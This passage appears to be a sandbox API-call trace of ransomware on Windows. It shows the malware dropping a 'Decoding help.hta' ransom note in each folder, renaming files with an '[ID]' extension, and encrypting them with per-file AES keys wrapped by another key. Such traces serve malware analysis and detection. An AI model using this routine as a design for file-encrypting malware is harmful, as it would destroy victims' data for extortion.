lpString2="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0060.895] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0060.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]" [0060.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.896] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0x20d9fd30 | out: lpFindFileData=0x20d9fd30*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe5bc2f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x41d, dwReserved0=0x0, dwReserved1=0x0, cFileName="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="D42CC0~1")) returned 1 [0060.896] lstrcpyW (in: lpString1=0x2a960ad8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" [0060.896] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned 56 [0060.896] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta" [0060.896] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\decoding help.hta")) returned 0x1 [0060.896] lstrcmpiW (lpString1="Decoding help.hta", lpString2="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 1 [0060.896] lstrlenW (lpString="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0060.896] lstrcmpiW (lpString1="[ID]", lpString2="e53f") returned -1 [0060.896] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" [0060.896] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned 56 [0060.896] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpString2="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0060.896] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0060.896] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]" [0060.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xda4 [0060.897] CreateFileMappingA (hFile=0xda4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xda0 [0060.897] CryptAcquireContextA (phProv=0x20d9fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 760 os_tid = 0x32c [0054.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*", lpFindFileData=0x20edfd30 | out: lpFindFileData=0x20edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da638 [0056.836] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.836] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x20edfd30 | out: lpFindFileData=0x20edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.836] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.836] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.836] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x20edfd30 | out: lpFindFileData=0x20edfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.837] lstrcpyW (in: lpString1=0x252c7f18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*" [0056.837] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*") returned 63 [0056.837] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Decoding help.hta" [0056.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\decoding help.hta")) returned 0xffffffff [0056.837] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaac [0058.307] WriteFile (in: hFile=0xaac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x20edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x20edfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.308] CloseHandle (hObject=0xaac) returned 1 [0058.308] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.308] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.308] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.308] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*" [0058.308] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\*.*") returned 63 [0058.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg" [0058.308] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg" [0058.308] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaac [0058.309] CreateFileMappingA (hFile=0xaac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xab0 [0058.309] CryptAcquireContextA (in: phProv=0x20edfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x20edfcec*=0x2aac5120) returned 1 [0060.196] CryptGenKey (in: hProv=0x2aac5120, Algid=0x6610, dwFlags=0x1, phKey=0x20edfce8 | out: phKey=0x20edfce8*=0x42cf7d8) returned 1 [0060.196] CryptExportKey (in: hKey=0x42cf7d8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x20edfbe4, pdwDataLen=0x20edfce4 | out: pbData=0x20edfbe4*, pdwDataLen=0x20edfce4*=0x2c) returned 1 [0060.196] MapViewOfFile (hFileMappingObject=0xab0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x4990000 [0061.158] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x20edfbe4*, pdwDataLen=0x20edfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x20edfbe4*, pdwDataLen=0x20edfcf8*=0x100) returned 1 [0061.160] CryptEncrypt (in: hKey=0x42cf7d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4990000*, pdwDataLen=0x20edfce4*=0x140, dwBufLen=0x140 | out: pbData=0x4990000*, pdwDataLen=0x20edfce4*=0x140) returned 1 [0061.162] UnmapViewOfFile (lpBaseAddress=0x4990000) returned 1 [0061.164] CloseHandle (hObject=0xab0) returned 1 [0061.164] CryptDestroyKey (hKey=0x42cf7d8) returned 1 [0061.164] CryptReleaseContext (hProv=0x2aac5120, dwFlags=0x0) returned 1 [0061.164] SetFilePointerEx (in: hFile=0xaac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.164] WriteFile (in: hFile=0xaac, lpBuffer=0x20edfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x20edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x20edfbe4*, lpNumberOfBytesWritten=0x20edfcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.165] WriteFile (in: hFile=0xaac, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x20edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x20edfcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.165] CloseHandle (hObject=0xaac) returned 1 [0061.166] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.166] FindNextFileW (in: hFindFile=0x5da638, lpFindFileData=0x20edfd30 | out: lpFindFileData=0x20edfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 0 [0061.166] FindClose (in: hFindFile=0x5da638 | out: hFindFile=0x5da638) returned 1 Thread: id = 761 os_tid = 0x950 [0054.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*", lpFindFileData=0x2119fd30 | out: lpFindFileData=0x2119fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db9b8 [0056.850] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.850] FindNextFileW (in: hFindFile=0x5db9b8, lpFindFileData=0x2119fd30 | out: lpFindFileData=0x2119fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.850] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.850] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.850] FindNextFileW (in: hFindFile=0x5db9b8, lpFindFileData=0x2119fd30 | out: lpFindFileData=0x2119fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.850] lstrcpyW (in: lpString1=0x1130c240, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*" [0056.850] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*") returned 63 [0056.850] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Decoding help.hta" [0056.850] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\decoding help.hta")) returned 0xffffffff [0056.850] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb48 [0058.345] WriteFile (in: hFile=0xb48, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2119fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2119fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.345] CloseHandle (hObject=0xb48) returned 1 [0058.345] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.346] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.346] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.346] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*" [0058.346] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\*.*") returned 63 [0058.346] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg" [0058.346] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg" [0058.346] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb48 [0058.347] CreateFileMappingA (hFile=0xb48, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb4c [0058.347] CryptAcquireContextA (in: phProv=0x2119fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2119fcec*=0x2aac5808) returned 1 [0060.203] CryptGenKey (in: hProv=0x2aac5808, Algid=0x6610, dwFlags=0x1, phKey=0x2119fce8 | out: phKey=0x2119fce8*=0x5fca2e0) returned 1 [0060.203] CryptExportKey 